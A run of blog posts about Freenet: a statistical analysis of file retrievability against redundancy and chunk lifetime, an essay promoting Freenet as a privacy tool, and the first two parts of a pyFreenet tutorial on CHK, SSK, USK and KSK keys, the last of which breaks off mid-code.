Dear GNU Hackers, thank you for this masterpiece!

And if you were crazy enough to read till here, Happy Hacking to you!

AnhangGröße
2014-07-21-Mo-exact-math-to-the-rescue-guile-scheme.org4.41 KB

Exploring the probability of successfully retrieving a file in freenet, given different redundancies and chunk lifetimes

In this text I want to explore the behaviour of the degrading yet redundant anonymous file storage in Freenet. It only applies to files which were not subsequently retrieved.

Every time you retrieve a file, it gets healed which effectively resets its timer as far as these calculations here are concerned. Due to this, popular files can and do live for years in freenet.

1 Static situation

Firstoff we can calculate the retrievability of a given file with different redundancy levels, given fixed chunk retrieval probabilities.

Files in Freenet are cut into segments which are again cut into up to 256 chunks each. With the current redundancy of 100%, only half the chunks of each segment have to be retrieved to get the whole file. I call that redundancy “2x”, because it inserts data 2x the size of the file (actually that’s just what I used in the code and I don’t want to force readers - or myself - to make mental jumps while switching from prose to code).

We know from the tests done by digger3, that after 31 days about 50% of the chunks are still retrievable, and after 30 days about 30%. Let’s look how that affects our retrieval probabilities.

# encoding: utf-8
from spielfaehig import spielfähig
from collections import defaultdict
data = []
res = []
for chunknumber in range(5, 105, 5):...
byred = defaultdict(list)
for num, prob, red, retrieval in data:...
csv = "; num prob retrieval"
for red in byred:...

# now plot the files

plotcmd = """
set term png
set width 15
set xlabel "chunk probability"
set ylabel "retrieval probability"
set output freenet-prob-redundancy-2.png
plot "2.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
set output freenet-prob-redundancy-3.png
plot "3.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
set output freenet-prob-redundancy-4.png
plot "4.csv" using 2:3 select ($1 == 5) title "5 chunks", "" using 2:3 select ($1 == 10) title "10 chunks", "" using 2:3 select ($1 == 30) title "30 chunks", "" using 2:3 select ($1 == 100) title "100 chunks"
"""
with open("plot.pyx", "w") as f:...

from subprocess import Popen
Popen(["pyxplot", "plot.pyx"])

So what does this tell us?

./freenet-prob-redundancy-2.png

Retrieval probability of a given file in a static case. redundancy 100% (2)

redundancy 200% (3)

Retrieval probability of a given file in a static case. redundancy 200% (3)

redundancy 300% (4)

Retrieval probability of a given file in a static case. redundancy 300% (4)

This looks quite good. After all, we can push the lifetime as high as we want by just increasing redundancy.

Sadly it is also utterly wrong :) Let’s try to get closer to the real situation.

2 Dynamic Situation: The redundancy affects the replacement rate of chunks

To find a better approximation of the effects of increasing the redundancy, we have to stop looking at freenet as a fixed store and have to start seeing it as a process. More exactly: We have to look at the replacement rate.

2.1 Math

A look on the stats from digger3 shows us, that after 4 weeks 50% of the chunks are gone. Let’s call this the dropout rate. The dropout rate consists of churn and chunk replacement:

dropout = churn + replacement

Since after one day the dropout rate is about 10%, I’ll assume that the churn is lower than 10%. So for the following parts, I’ll just ignore the churn (naturally this is wrong, but since the churn is not affected by redundancy, I just take it as constant factor. It should reduce the negative impacts of increasing redundancy). So we will only look at replacement of blocks.

Replacement consists of new inserts and healing of old files.

replacement = insert + healing

If we increase the redundancy from 2 to 3, the insert and healing rate should both increase by 50%, so the replacement rate should increase by 50%, too. The healing rate might increase a bit more, because healing can now restore 66% of the file as long as at least 33% are available. I’ll ignore that, too, for the time being (which is wrong again. We will need to keep this in mind when we look at the result).

redundancy 2 → 3 ⇒ replacement rate × 1.5

Increasing the replacement rate by 50% should decrease the lifetime of chunks by 1/1.5, or:

chunk lifetime × 2/3

So we will be at the 50% limit not after 4 weeks, but after 10 days. But on the other hand, redundancy 3 only needs 33% chunk probability, which has 2× the lifetime of 50% chunk probability. So the file lifetime should change by 2×2/3 = 4/3:

file lifetime × 4/3 = file lifetime +33%

Now doesn’t that look good?

As you can imagine, this pretty picture hides a clear drawback: The total storage capacity of Freenet gets reduced by 33%, too, because now every file requires 1.5× as much space as before.

2.2 Caveats (whoever invented that name? :) )

We ignored churn, so the chunk lifetime reduction should be a bit less than the estimated 33%%. That’s good and life is beautiful, right? :)

NO. We also ignored the increase in the healing rate. This should be higher, because every retrieved file can now insert more of itself in the healing process. If we had no new inserts, I would go as far as saying that the healing-rate might actually double with the increased redundancy. So in a network completely filled network without new data, the effects of the higher redundancy and the higher replacement rate would exactly cancel. But the higher redundancy would be able to store less files. Since we are constantly pushing new data into the network (for example via discussions in Sone), this should not be the case.

2.3 Dead space

Aside from hiding some bad effects, this simple model also hides a nice effect: A decreased amount of dead space.

Firstoff, lets define it:

2.4 What is dead space?

Dead space is the part of the storage space which cannot be used for retrieving files. With any redundancy, that dead space is just about the size of the original file without redundancy multiplier. So for redundancy 2, the storage space occupied by the file is dead, when less than 50% are available. With redundancy 3, it is dead when less than 33% are available.

2.5 Effect

That dead space is replaced like any other space, but it is never healed. So the higher replacement rate means that dead space is recovered more quickly. So, while a network with higher redundancy can store less files overall, those files which can no longer be retrieved take up less space. I won’t add the math for that, here, though (because I did not do that yet).

2.6 Closing

So, as closing remark, we can say that increasing the redundancy will likely increase the lifetime of files. It will also reduce the overall storage space in Freenet, though. I think it would be worthwhile.

It might also be possible to give probability estimates in the GUI which show how likely it is that we can retrieve a given file after a few percent were downloaded: If more than 1/redundancy chunks succeed, the probability to get the file is high. if close to 1/redundancy succeed, the file will be slow, because we might have to wait for nodes which went online and will come back at some point. Essentially we will have to hope for churn. If much less than 1/redundancy of the chunks succeed, we can stop trying to get the file.

Just use the code in here for that :)

3 Background and deeper look

Why redundancy after all redundancy 1: 1 chunk fails ⇒ file fails. redundancy 2: 50% redundancy 3: 33%

3.1 No redundancy

Let’s start with redundancy 1. If one chunk fails, the whole file fails.

Compared to freenet today the replacement rate would be halved, because each file takes up only half the current space. So the 50% dead chunks rate would be reached after 8 weeks instead of after 4 weeks. And 90% would be after 2 days instead of after 1 day. We can guess that 99% would be after a few hours.

Let’s take a file with 100 chunks as example. That’s 100× 32 kiB, or about 3 Megabyte. After a few hours the chance will be very high that it will have lost one chunk and will be irretrievable. Freenet will still have 99% of the chunks, but they will be wasted space, because the file cannot be recovered anymore. The average lifetime of a file will just be a few hours.

With 99% probability of retrieving a chunk, the probability of retrieving a file will be only about 37%.

from spielfaehig import spielfähig
return spielfähig(0.99, 100, 100)
→ 0.366032341273

To achieve 90% retrievability of the file, we need a chunk availability of 99,9%! The file is essentially dead directly after the insert finishes.

from spielfaehig import spielfähig
return spielfähig(0.999, 100, 100)
→ 0.904792147114

3.2 1% redundancy

Now, lets add one redundant chunk. Almost nothing will have changed for inserting and replacing, but now the probability of retrieving the file when the chunks have 99% availability is 73%!

from spielfaehig import spielfähig
return spielfähig(0.99, 101, 100)
→ 0.732064682546

The replacement rate is increased by 1%, as is the storage space.

To achieve 90% retrievability, we actually need a chunk availability of 99,5%. So we might have 90% retrievability one hour after the insert.

from spielfaehig import spielfähig
return spielfähig(0.995, 101, 100)
→ 0.908655654736

Let’s check for 50%: We need a chunk probability of about 98,4%

from spielfaehig import spielfähig
return spielfähig(0.984, 101, 100)
→ 0.518183035909

The mean lifetime of a file changed from about zero to a few hours.

3.3 50% redundancy

Now, let’s take a big step: redundancy 1.5. Now we need 71,2% block retrievability to have a 90% chance of retrieving one file.

from spielfaehig import spielfähig
return spielfähig(0.712, 150, 100)
→ 0.904577767501

for 50% retrievability we need 66,3% chunk availability.

from spielfaehig import spielfähig
return spielfähig(0.663, 150, 100)
→ 0.500313163333

66% would be reached in the current network after about 20 days (between 2 weeks and 4 weeks), and in a zero redundancy network after 40 days. fetch-pull-stats

At the same time, though, the chunk replacement rate increased by 50%, so the mean chunk lifetime decreased by factor 2/3. So the lifetime of a file would be 4 weeks.

3.4 Generalize this

So, now we have calculations for redundancy 1, 1.5, 2 and 3. Let’s see if we can find a general (if approximate) rule for redundancy.

From the fetch-pull-graph from digger3 we see empirically, that between one week and 18 weeks each doubling of the lifetime corresponds to a reduction of the chunk retrieval probability of 15% to 20%.

Also we know that 50% probability corresponds to 4 weeks lifetime.

And we know that redundancy x has a minimum required chunk probability of 1/x.

With this, we can model the required chunk lifetime as a function of redundancy:

chunk lifetime = 4 * 2**((0.5-1/x)/0.2)

with x as redundancy. Note: this function is purely empirical and approximate.

Having the chunk lifetime, we can now model the lifetime of a file as a function of its redundancy:

file lifetime = (2/x) * 4 * (2**((0.5-1/x)/0.2))

We can now use this function to find an optimum of the redundancy if we are only concerned about file lifetime. Naturally we could get the trusty wxmaxima and get the derivative of it to find the maximum. But that is not installed right now, and my skills in getting the derivatives by hand are a bit rusty (note: install running). So we just do it graphically. The function is not perfectly exact anyway, so the errors introduced by the graphic solution should not be too big compared to the errors in the model.

Note however, that this model is only valid in the range between 20% and 90% chunk retrieval probability, because the approximation for the chunk lifetime does not hold anymore for values above that. Due to this, redundancy values close to or below 1 won’t be correct.

Also keep in mind that it does not include the effect due to the higher rate of removing dead space - which is space that belongs to files which cannot be recovered anymore. This should mitigate the higher storage requirement of higher redundancy.

# encoding: utf-8
plotcmd = """
set term png
set width 15
set xlabel "redundancy"
set ylabel "lifetime [weeks]"
set output "freenet-prob-function.png"
set xrange [0:10]
plot (2/x) * 4 * (2**((0.5-1/x)/0.2))
"""
with open("plot.pyx", "w") as f:...

from subprocess import Popen
Popen(["pyxplot", "plot.pyx"])

4 Summary: Merit and outlook

Now, what do we make of this?

Firstoff: If the equations are correct, an increase in redundancy would improve the lifetime of files by a maximum of almost a week. Going further reduces the lifetime, because the increased replacement of old data outpaces the improvement due to the higher redundancy.

Also higher redundancy needs a higher storage capacity, which reduces the overall capacity of freenet. This should be partially offset by the faster purging of dead storage space.

The results support an increase in redundancy from 2 to 3, but not to 4.

Well, and aren’t statistics great? :)

Additional notes: This exploration ignores:

  • healing creates less insert traffic than new inserts by only inserting failed segments, and it makes files which get accessed regularly live much longer,
  • inter-segment redundancy improves the retrieving of files, so they can cope with a retrievability of 50% of any chunks of the file, even if the distribution might be skewed for a single segment,
  • Non-uniformity of the network which makes it hard to model effects with global-style math like this,
  • Seperate stores for SSK and CHK keys, which improve the availability of small websites and
  • Usability and security impact of increased insert times (might be reduced by only inserting 2/3rd of the file data and letting healing do the rest when the first downloader gets the file)

Due to that, the findings can only provides clues for improvements, but cannot perfectly predict the best path of action. Thanks to evanb for pointing them out!

If you are interested in other applications of the same theory, you might enjoy my text Statistical constraints for the design of roleplaying games (RPGs) and campaigns (german original: Statistische Zwänge beim Rollenspiel- und Kampagnendesign). The script spielfaehig.py I used for the calculations was written for a forum discussion which evolved into that text :)

This text was written and checked in emacs org-mode and exported to HTML via `org-export-as-html-to-buffer`. The process integrated research and documentation. In hindsight, that was a pretty awesome experience, especially the inline script evaluation. I also attached the org-mode file for your leisure :)

AnhangGröße
freenet-prob-redundancy-2.png67.05 KB
freenet-prob-redundancy-3.png65.67 KB
freenet-prob-redundancy-4.png63.43 KB
freenet-success-probability.org14.84 KB
freenet-prob-function.png20.5 KB
fetch_dates_graph-2012-03-16.png17.25 KB
spielfaehig.py.txt1.15 KB

Freenet / Hyphanet: The forgotten cypherpunk paradise

PDF

PDF (to print)

Org (source)

Text (for email)

A long time ago in a chatroom far away, select groups of crypto-anarchists gathered to discuss the death of privacy since the NSA could spy on all communications with ease. Among those who proposed technical solutions was a student who later published the widely regarded first paper on Freenet: A decentralized anonymous datastore which was meant to be a cypherpunk paradise: true censorship resistance, no central authority and long lifetime only for information which people were actually interested in.

Many years passed, two towers fell, the empire expanded its hunt for rebels all over the globe, and now, as the empire’s grip has become so horrid that even the most loyal servants of the emperors turn against them and expose their dark secrets to the masses, Freenet is still moving forward. Lost to the eye of the public, Freenet shaped and reshaped itself - all the while maintaining its focus to provide true freedom of the press in the internet.

A new old hope

Once only a way to anonymously publish one-shot websites that other members of the group could see, Freenet now provides its users with most services found in the normal internet, yet safe from the prying eyes of the empire. Its users communicate with each other using email which hides metadata, micro-blogging with real anonymity, forums on a wide number of topics - from politics to drug-experiences - and websites with update-notifications (howto) and streaming media (howto) whose topics span from music and anime over religion and programming to life without a state, spaceflight and news feeds.

All these possibilities emerge from its decentralized datastore and the tools built on top of a practically immutable data structure, and all its goals emerge from providing real freedom of the press. Decentralization is required to avoid providing a central place for censorship. Anonymity is needed to protect people against censorship by threat of subsequent punishment, prominently used in China where it is only illegal to write something against the state if too many people should happen to read it. Private communication is needed to allow whistleblowers to contact journalists and also to discuss articles before publication, invisible access to information makes it hard to censor articles by making everyone a suspect who reads one of those articles, as practiced by the NSA which puts everyone on the watchlist who accesses freenetproject.org or the Linux Journal (reported by german public TV program Panorama). And all this has to be convenient enough that journalists can actually use it during their quite stressful daily work. As side effect it provides true online freedom, because if something is safe enough for a whistleblower, it is likely safe enough for most other communication, too.

These goals pushed Freenet development into areas which other groups only touched much later - or not at all. And except for convenience, which is much harder to get right in a privacy-sensitive context than it seems, Freenet nowadays manages to fulfill these goals very well.

The empire strikes the web

The cloud was “invented” and found to be unsafe, yet Freenet already provided its users with a safe cloud. Email was found to spill all your secrets, while Freenet already provided its users with privacy preserving emails. Disaster control became all the rage after hurricane Katrina and researchers scrambled to find solutions for communicating on restricted routes, and Freenet already provided a globally connectable darknet on friend-to-friend connections. Blogs drowned in spam comments and most caved in and switched to centralized commenting solutions, which made the fabled blogosphere into little more than a PR outlet for Facebook, but Freenet already provided spam resistance via an actually working web of trust - after seeing the non-spam-resistant forum system Frost burn when some trolls realized that true anonymity also means complete freedom to use spam-bots. Censorship and total surveillance of user behavior on Facebook were exposed, G+ required users to use their real names and Twitter got blocked in many repressive regimes, whereas Freenet already provided hackers with convenient, decentralized, anonymous micro-blogging. Now websites are cracked by the minute and constant attacks made it a chore for private webmasters simply to stay available, though Freenet already offers attack-resistant hosting which stays online as long as people are interested in the content.

All these developments happened in a private microcosmos, where new and strange ideas could form and hatch, an incubator where reality could be rethought and rewritten to reestablish privacy in the internet. The internet was hit hard, and Freenet evolved to provide a refuge for those who could use it.

The return of privacy

What started as the idea of a student was driven forward by about a dozen free-time coders and one paid developer for more than a decade - funded by donations from countless individuals - and turned into a true forgotten cryptopunk paradise: actual working solutions to seemingly impossible problems, highly detailed documentation streams in a vast nothingness to be explored only by the initiated (where RTFS is a common answer: Read The Friendly Source), all this with plans and discussions about saving the world mixed in.

The practical capabilities of Freenet should be known to every cryptopunk - but a combination of mediocre user experience, bad communication and worse PR (and maybe something more sinister, if Poul-Henning Kamp should prove to be farsighted about project Orchestra) brought us to a world where a new, fancy, half finished, partially thought through, cash-cow searching project comes around and instead of being asked “how’s that different from Freenet?”, the next time I talk to a random crypto-loving stranger about Freenet I am asked “how is Freenet different from X which just made the news?” (the answer which fits every single time is: “Even if X should work, it would provide only half of Freenet, and missing essential features - friend-to-friend darknet, access dependent content lifetime, decentralized spam resistance, stable pseudonyms, protection against forced exposure, hosting without a server”).

Now, after many years of work have culminated in a big step forward, it is time for Freenet to re-emerge from hiding and take its place as one of the few privacy tools actually proven to work - and as the single tool with the most ambitious goal: Reestablishing freedom of the press and freedom of speech in the internet.

Freenet re-awakens: Join in

If you do not have the time for large scale contribution, a good way to support freenet is to run and use it - and ask your friends to join in, ideally over darknet.

Freenet Logo: Follow the RabbitFreenet Logo: Follow the RabbitInstall Freenet

More information about the movement which spawned Freenet can be found in Wikipedia under Cypherpunk.

If you can program, there are lots of low hanging fruit: small tasks which allow reaping the fruits of existing solutions to hard problems. Or, if you want to harness Freenet for your own tools, have a look at the Freenet Communication Primitives.

My recent work on freenet includes 4 hours of hacking the Python-based site uploader in pyFreenet which sped up the load time of its sites by up to a factor of 4. If you want to join, come to #freenet @ freenode to chat, discuss with us in the freenet devl mailing list and check the github-project.

Freenet Logo: Follow the Rabbit Welcome to Freenet, where no one can watch you read. → freenetproject.org

Creative Commons License

I hereby release this article under the CC attribution License: You can use the text however you like as long as you name me (Arne Babenhauserheide) and link here ( draketo.de/english/freenet/forgotten-cryptopunk-paradise or draketo.de/node/656 ).

A huge thank you goes to Lacrocivious who helped me improve this text a lot! A second thank you goes to the other Freenet users with whom I discussed the article via Darknet-messages, when we were still thinking about submitting it to Wired and therefore needed to keep it confidential.

AnhangGröße
2014-08-24-So-freenet-forgotten-cryptopunk-paradise.pdf85.01 KB
freenet-forgotten-cryptopunk-paradise-mail.txt8.4 KB
freenet-forgotten-cryptopunk-paradise-pdf-thumb.png8.51 KB
2014-08-24-So-freenet-forgotten-cryptopunk-paradise.org7.93 KB
freenet_logo.png2.26 KB

Freenet Communication Primitives: Part 1, Files and Sites

Basic building blocks for communication in Freenet.

This is a guide to using Freenet as backend for communication solutions - suitable for anything from filesharing over chat up to decentrally hosted game content like level-data. It uses the Python interface to Freenet for its examples.

TheTim from Tim Moore, licensed under cc by
TheTim
from Tim Moore,
License: cc by.

This guide consists of several installments: Part 1 (this text) is about exchanging data, Part 2 is about confidential communication and finding people and services without drowning in spam and Part 3 ties it all together by harnessing existing plugins which already include all the hard work which distinguishes a quick hack from a real-world system. Happy Hacking and welcome to Freenet, the forgotten cypherpunk paradise where no one can watch you read!

1 Introduction

The immutable datastore in Freenet provides the basic structures for implementing distributed, pseudonymous, spam-resistant communication protocols. But until now there was no practically usable documentation how to use them. Every new developer had to find out about them by asking, speculating and second guessing the friendly source (also known as SGTFS).

We will implement the answers using pyFreenet. Get it from http://github.com/freenet/pyFreenet

We will not go into special cases. For these have a look at the API-documentation of fcp.node.FCPNode().

1.1 Install pyFreenet

To follow the code examples in this article, install Python 2 with setuptools and then run

easy_install --user --egg pyFreenet==0.4.0

2 Sharing a File: The CHK (content hash key)

The first and simplest task is sharing a file. You all know how this works in torrents and file hosters: You generate a link and give that link to someone else.

To create that link, you have to know the exact content of the file beforehand.

import fcp
n = fcp.node.FCPNode()
key = n.put(data="Hello Friend!")
print key
n.shutdown()

Just share this key, and others can retrieve it. Use http://127.0.0.1:8888/ as prefix, and they can even click it - if they run Freenet on their local computer or have an SSH forward for port 8888.

The code above only returns once the file finished uploading. The Freenet Client Protocol (that’s what fcp stands for) however is asynchronous. When you pass async=True to n.put() or n.get(), you get a job object which gives you the result via job.wait().

To generate the key without actually uploading the file, use chkonly=True as argument to n.put().

Let’s test retrieving a file:

import fcp
n = fcp.node.FCPNode()
key = n.put(data="Hello Friend!")
mime, data, meta = n.get(key)
print data
n.shutdown()

This code anonymously uploads an invisible file into Freenet which can only be retrieved with the right key. Then it downloads the file from Freenet using the key and shows the data.

That the put and the get request happen from the same node is a mere implementation detail: They could be fired by total strangers on different sides of the globe and would still work the same. Even the performance would be similar.

Note: fcp.node.FCPNode() opens a connection to the Freenet node. You can have multiple of these connections at the same time, all tracking their own requests without interfering with each other. Just remember to call n.shutdown() on each of them to avoid getting ugly backtraces.

So that’s it. We can upload and download files, completely decentrally, anonymously and confidentially.

There’s just one caveat: We have to exchange the key. And to generate that key, we have to know the content of the file.

Let’s fix that.

3 Public/Private key publishing: The SSK (signed subspace key)

Our goal is to create a key where we can upload a file in the future. We can generate this key and tell someone else: Watch this space.

So we will generate a key, start to download from the key and insert the file to the key afterwards.

import fcp
n = fcp.node.FCPNode()
# we generate a key with the additional filename hello.
public, private = n.genkey(name="hello")
job = n.get(public, async=True)
n.put(uri=private, data="Hello Friend!")
mime, data, meta = job.wait()
print data
n.shutdown()

These 8 lines of code create a key which you could give to a friend. Your friend will start the download and when you get hold of that secret hello-file, you upload it and your friend gets it.

Hint: If you want to test whether the key you give is actually used, you can check the result of n.put(). It returns the key with which the data can be retrieved.

Using the .txt suffix makes Freenet use the mimetype text/plain. Without extension it will use application/octet-stream.

If you start downloading before you upload as we do here, you can trigger a delay of about half an hour due to overload protections (the mechanism is called “recently failed”).

Note that you can only write to a given key-filename combination once. If you try to write to it again, you’ll get conflicts – your second upload will in most cases just not work. You might recognize this from immutable datastructures (without the conflict stuff). Freenet is the immutable, distributed, public/private key database you’ve been phantasizing about when you had a few glasses too many during that long night. So best polish your functional programming skills. You’re going to use them on the level of practical communication.

3.1 short roundtrip time (speed hacks)

A SSK is a special type of key, and similar to inodes in a filesystem it can carry data. But if used in the default way, it will forward to a CHK: The file is salted and then inserted to a CHK which depends on the content and then some, ensuring that the key cannot be predicted from the data (this helps avoid some attacks against your anonymity).

When we want a fast round trip time, we can cut that. The condition is that your data plus filename is less than 1KiB after compression, the amount of data a SSK can hold. And we have to get rid of the metadata. And that means: With pyFreenet use the application/octet-stream mime type, because that’s the default one, so it is left out on upload. If you use raw access to FCP, omit Metadata.ContentType or set it to "". And insert single files (we did not yet cover uploading folders: You can do that, but they will forward to a CHK).

import fcp
n = fcp.node.FCPNode()
# we generate a key with the additional filename hello.
public, private = n.genkey(name="hello.txt")
job = n.get(public, async=True, realtime=True, priority=0)
n.put(uri=private, data="Hello Friend!", mimetype="application/octet-stream", realtime=True, priority=0)
mime, data, meta = job.wait()
print public
print data
n.shutdown()

To check whether we managed to avoid the metadata, we can use the KeyUtils plugin to analyze the key.

If it is right, when putting the key into the text field on the http://127.0.0.1:8888/KeyUtils/ site, you’ll see something like this:

0000000: 4865 6C6C 6F20 4672 6965 6E64 21
         Hello Friend!

Also we want to use realtime mode (optimized for the webbrowser: reacting quickly but with low throughput) with a high priority.

Let’s look at the round trip time we achieve:

import time
import fcp
n = fcp.node.FCPNode()
# we generate two keys with the additional filename hello.
public1, private1 = n.genkey(name="hello1.txt")
public2, private2 = n.genkey(name="hello2.txt")
starttime = time.time()
job1 = n.get(public1, async=True, realtime=True, priority=1)
job2 = n.get(public2, async=True, realtime=True, priority=1)
n.put(uri=private1, data="Hello Friend!",
      mimetype="application/octet-stream",
      realtime=True, priority=1)
mime, data1, meta = job1.wait()
n.put(uri=private2, data="Hello Back!",
      mimetype="application/octet-stream",
      realtime=True, priority=1)
mime, data2, meta = job2.wait()
rtt = time.time() - starttime
n.shutdown()
print public1
print public2
print data1
print data2
print "RTT (seconds):", rtt

When I run this code, I get less than 80 seconds round trip time. Remember that we’re uploading two files anonymously into a decentralized network, discover them and then download them, and all that in serial. Less than a minute to detect an upload to known key.

90s is not instantaneous, but when looking at usual posting frequencies in IRC and other chat, it’s completely sufficient to implement a chat system. And in fact it’s how FLIP is implemented: IRC over Freenet.

Compare this to the performance when we do not use the short round trip time trick of avoiding the Metadata and using the realtime queue:

import time
import fcp
n = fcp.node.FCPNode()
# we generate two keys with the additional filename hello.
public1, private1 = n.genkey(name="hello1.txt")
public2, private2 = n.genkey(name="hello2.txt")
starttime = time.time()
job1 = n.get(public1, async=True)
job2 = n.get(public2, async=True)
n.put(uri=private1, data="Hello Friend!")
mime, data1, meta = job1.wait()
n.put(uri=private2, data="Hello Back!")
mime, data2, meta = job2.wait()
rtt = time.time() - starttime
n.shutdown()
print public1
print public2
print data1
print data2
print "RTT (seconds):", rtt

With 300 seconds (5 minutes), that’s more than 3x slower. So you see, if you have small messages and you care about latency, you want to do the latency hacks.

4 Upload Websites: SSK as directory

So now we can upload single files, but the links look a lot like what we see on websites: http://127.0.0.1:8888/folder/file. So can we just mirror a website? The answer is: Yes, definitely!

import fcp
n = fcp.node.FCPNode()
# We create a key with a directory name
public, private = n.genkey() # no filename: we need different ones
index = n.put(uri=private + "index.html",
      data='''<html>
  <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
  <body>Hello World!</body></html>''')
n.put(uri=private + "style.css", 
      data='body {color: red}\n')
print index
n.shutdown()

Now we can navigate to the key in the freenet web interface and look at our freshly uploaded website! The text is colored red, so it uses the stylesheet. We have files in Freenet which can reference each other by relative links.

4.1 Multiple directories below an SSK

So now we can create simple websites on an SSK. But here’s a catch: key/hello/hello.txt simply returns key/hello. What if we want multiple folders?

For this purpose, Freenet provides manifests instead of single files. Manifests are tarballs which include several files which are then downloaded together and which can include references to external files - named redirects. They can be uploaded as folders into the key. And in addition to these, there are quite a few other tricks. Most of them are used in freesitemgr which uses fcp/sitemgr.py.

But we want to learn how to do it ourselves, so let’s do a more primitive version manually via n.putdir():

import os
import tempfile

import fcp
n = fcp.node.FCPNode()
# we create a key again, but this time with a name: The folder of the
# site: We will upload it as a container.
public, private = n.genkey()
# now we create a directory
tempdir = tempfile.mkdtemp(prefix="freesite-")
with open(os.path.join(tempdir, "index.html"), "w") as f:
    f.write('''<html>
    <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
    <body>Hello World!</body></html>''')

with open(os.path.join(tempdir, "style.css"), "w") as f:
    f.write('body {color: red}\n')

uri = n.putdir(uri=private, dir=tempdir, name="hello", 
               filebyfile=True, allatonce=True, globalqueue=True)
print uri
n.shutdown()

That’s it. We just uploaded a folder into Freenet.

But now that it’s there, how do we upload a better version? As already said, files in Freenet are immutable. So what’s the best solution if we can’t update the data, but only upload new files? The obvious solution would be to just number the site.

And this is how it was done in the days of old. People uploaded hello-1, hello-2, hello-3 and so forth, and in hello-1 they linked to an image under hello-2. When visitors of hello-1 saw that the image loaded, they knew that there was a new version.

When more and more people adopted that, Freenet added core support: USKs, the updatable subspace keys.

We will come to that in the next part of this series: Service Discovery and Communication.

AnhangGröße
thetim-tim_moore-flickr-cc_by-2471774514_8c9ed2a7e5_o-276x259.jpg19.79 KB

Freenet Communication Primitives: Part 2, Service Discovery and Communication

Basic building blocks for communication in Freenet.

This is a guide to using Freenet as backend for communication solutions - suitable for anything from filesharing over chat up to decentrally hosted game content like level-data. It uses the Python interface to Freenet for its examples.

Mirror, Freenet Project, Arne Babenhauserheide, GPL
Mirror,
Freenet Project,
License: GPL.

This guide consists of several installments: Part 1 is about exchanging data, Part 2 is about confidential communication and finding people and services without drowning in spam and Part 3 ties it all together by harnessing existing plugins which already include all the hard work which distinguishes a quick hack from a real-world system (this is currently a work in progress, implemented in babcom_cli which provides real-world usable functionality).

Note: You need the current release of pyFreenet for the examples in this article (0.3.2). Get it from PyPI:

# with setuptools
easy_install --user --egg pyFreenet==0.4.0
# or pip
pip install --user --egg pyFreenet==0.4.0

This is part 2: Service Discovery and Communication. It shows how to find new people, build secure communication channels and create community forums. Back when I contributed to Gnutella, this was the holy grail of many p2p researchers (I still remember the service discovery papers). Here we’ll build it in 300 lines of Python.

Welcome to Freenet, where no one can watch you read!

USK: The Updatable Subspace Key

USKs allow uploading increasing versions of a website into Freenet. Like numbered uploads from the previous article they simply add a number to site, but they automate upload and discovery of new versions in roughly constant time (using Date Hints and automatic checking for new versions), and they allow accessing a site as <key>/<name>/<minimal version>/ (never understimate the impact of convenience!).

With this, we only need a single link to provide an arbitrary number of files, and it is easy and fast to always get the most current version of a site. This is the ideal way to share a website in Freenet. Let’s do it practically.

import os
import tempfile

import fcp
n = fcp.node.FCPNode()
# we create a key again, but this time with a name: The folder of the
# site: We will upload it as a container.
public, private = n.genkey()
# now we create a directory
tempdir = tempfile.mkdtemp(prefix="freesite-")
with open(os.path.join(tempdir, "index.html"), "w") as f:
    f.write('''<html>
    <head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>First Site!</title></head>
    <body>Hello World!</body></html>''')

with open(os.path.join(tempdir, "style.css"), "w") as f:
    f.write('body {color: red}\n')

uri = n.putdir(uri=private, dir=tempdir, name="hello",
               filebyfile=True, allatonce=True, globalqueue=True,
               usk=True)
print uri
n.shutdown()

But we still need to first share the public key, so we cannot just tell someone where to upload the files so we see them. Though if we were to share the private key, then someone else could upload there and we would see it in the public key. We could not be sure who uploaded there, but at least we would get the files. Maybe we could even derive both keys from a single value… and naturally we can. This is called a KSK (old description).

KSK: Upload a file to a password

KSKs allow uploading a file to a pre-determined password. The file will only be detectable for those who know the password, so we have effortless, invisible, password protected files.

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
key = "KSK@" + _uuid
n.put(uri=key, data="Hello World!",
      Global=True, persistence="forever",
      realtime=True, priority=1)
print key
print n.get(key)[1]
n.shutdown()

Note: We’re now writing a communication protocol, so we’ll always use realtime mode. Be aware, though, that realtime is rate limited. If you use it for large amounts of data, other nodes will slow down your requests to preserve quick reaction of the realtime queue for all (other) Freenet users.

Note: Global=True and

persistence="forever"

allows telling Freenet to upload some data and then shutting down the script. Use async=True and waituntilsent=True to just start the upload. When the function returns you can safely exit from the script and let Freenet upload the file in the background - if necessary it will even keep uploading over restarts. And yes, Capitcalized Global looks crazy. For pyFreenet that choice is sane (though not beautiful), because Global gets used directly as parameter in the Freenet Client Protocol (FCP). This is the case for many of the function arguments. In putdir() there’s a globalqueue parameter which also sets persistence. That should become part of the put() API, but isn’t yet. There are lots of places where the pyFreenet is sane, but not beautiful. It seems like that’s its secret how it could keep working from 2008 till 2014 with almost no maintenance

For our purposes the main feature of KSKs is that we can tell someone to upload to an arbitrary phrase and then download that.

If we add a number, we can even hand out a password to multiple people and tell them to just upload to the first unused version. This is called the KSK queue.

KSK queue: Share files by uploading to a password

The KSK queue used to be the mechanism of choice to find new posts in forums, until spammers proved that real anonymity means total freedom to spam: they burned down the Frost Forum System. But we’ll build this, since it provides a basic building block for the spam-resistant system used in Freenet today.

Let’s just do it in code (descriptions are in the comments):

import fcp
import uuid # avoid spamming the global namespace

n = fcp.node.FCPNode()
_uuid = str(uuid.uuid1())
print "Hey, this is the password:", _uuid
# someone else used it before us
for number in range(2):
    key = "KSK@" + _uuid + "-" + str(number)
    n.put(uri=key, data="Hello World!", 
          Global=True, persistence="forever",
          realtime=True, priority=1,
          timeout=360) # 6 minutes
# we test for a free slot
for number in range(4):
  key = "KSK@" + _uuid + "-" + str(number)
  try:
    n.get(key, 
          realtime=True, priority=1, 
          timeout=60)
  except fcp.node.FCPNodeTimeout:
    break
# and write there
n.put(uri=key, data="Hello World!",
      Global=True, persistence="forever",
      realtime=True, priority=1,
